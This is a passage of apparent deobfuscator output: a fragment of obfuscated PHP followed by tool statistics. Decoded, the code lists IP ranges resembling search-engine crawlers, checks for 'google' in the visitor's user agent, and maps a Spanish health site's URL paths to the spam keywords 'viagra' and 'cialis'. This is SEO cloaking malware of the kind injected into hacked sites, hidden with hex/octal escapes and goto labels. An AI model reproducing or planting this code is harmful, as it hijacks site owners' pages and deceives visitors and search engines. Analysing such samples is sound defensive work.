"\62\x30\x37\56\61\x32\66\56\61\64\64\56\x31\55\62\60\67\x2e\61\62\x36\x2e\61\x35\71\56\x32\65\x34", "\x32\60\x39\x2e\x38\x35\56\x31\62\70\56\x31\x2d\x32\60\71\56\70\65\x2e\62\65\65\x2e\62\x35\64", "\x32\x31\66\x2e\62\63\x39\56\63\62\56\61\x2d\x32\61\66\x2e\x32\x33\71\56\66\63\x2e\x32\65\64", "\67\x32\56\61\64\56\x31\x39\71\x2e\60\55\67\x32\x2e\61\x34\56\61\x39\x39\56\x32\65\65", "\70\x2e\66\x2e\64\x38\56\60\55\70\56\66\x2e\x34\70\56\x32\65\x35", "\66\x37\56\x31\x39\65\x2e\60\x2e\60\x2d\66\67\56\x31\71\x35\x2e\62\x35\65\x2e\x32\65\65", "\66\71\x2e\61\x34\67\x2e\x36\x34\56\60\xe2\200\223\66\x39\x2e\x31\x34\x37\x2e\61\x32\67\x2e\62\65\65", "\67\62\56\63\x30\x2e\66\x34\56\60\xe2\x80\x93\67\x32\x2e\x33\60\56\62\x35\65\56\62\65\x35", "\67\x34\56\66\56\x30\x2e\60\342\200\x93\x37\64\x2e\66\x2e\62\x35\x35\x2e\62\65\x35", "\x36\65\x2e\x35\62\x2e\x30\56\x30\xe2\x80\x93\x36\x35\x2e\x35\x35\x2e\x32\65\x35\x2e\62\65\x35", "\x32\60\67\x2e\x34\x36\x2e\x30\x2e\60\xe2\x80\223\62\x30\x37\x2e\x34\x36\56\x32\65\65\x2e\x32\65\65"); goto M_hhF; cxDnJ: switch ($_11) { case "\x2f\x63\141\164\145\147\157\x72\x79\57\141\154\151\155\x65\x6e\164\x61\143\x69\157\156\x2f": case "\57\x63\x61\164\x65\x67\x6f\x72\171\57\143\x75\145\162\x70\x6f\57": case "\57\143\x61\164\x65\147\157\162\x79\x2f\x6d\x65\156\164\x65\x2f": case "\57\143\141\164\x65\147\157\x72\171\57\164\x65\162\141\x70\x69\x61\x73\57": case "\x2f\143\x61\164\x65\x67\x6f\x72\171\x2f\166\151\144\141\x2f": case "\57\143\x61\x74\x65\147\157\x72\171\57\143\x68\141\162\x6c\x61\163\x2d\x68\145\x61\x6c\x74\150\x79\x2f": $_12 = "\166\151\x61\x67\162\x61"; break; case "\x2f\143\165\162\x73\x6f\163\x2d\142\145\150\x65\x61\154\164\150\171\57": case "\x2f\x63\157\156\x74\x61\143\164\x6f\57": case "\x2f\x70\x75\x62\154\x69\143\x69\144\x61\144\x2f": case "\x2f\x63\141\162\x64\x69\157\x64\141\156\x63\145\x2f": case "\x2f\164\151\145\x6e\x64\x61\x2f": case "\x2f\x6d\141\x74\x72\x69\x63\165\154\x61\143\151\x6f\156\x2f": $_12 = "\143\x69\x61\x6c\151\x73"; break; } goto MLNLN; gmrvN: $_11 = $_SERVER["\122\x45\121\x55\105\123\124\137\x55\122\111"]; goto laHLK; Yx1hu: if (@stripos($_2, "\147\157\x6f\147\154\x65") !== false) { $_3 = true; } goto T3LTV; P1UQ_: ?>

Function Calls

None

Variables

None

Stats

MD5 c36f235357d6a2a6af7171ec351682b0
Eval Count 0
Decode Time 79 ms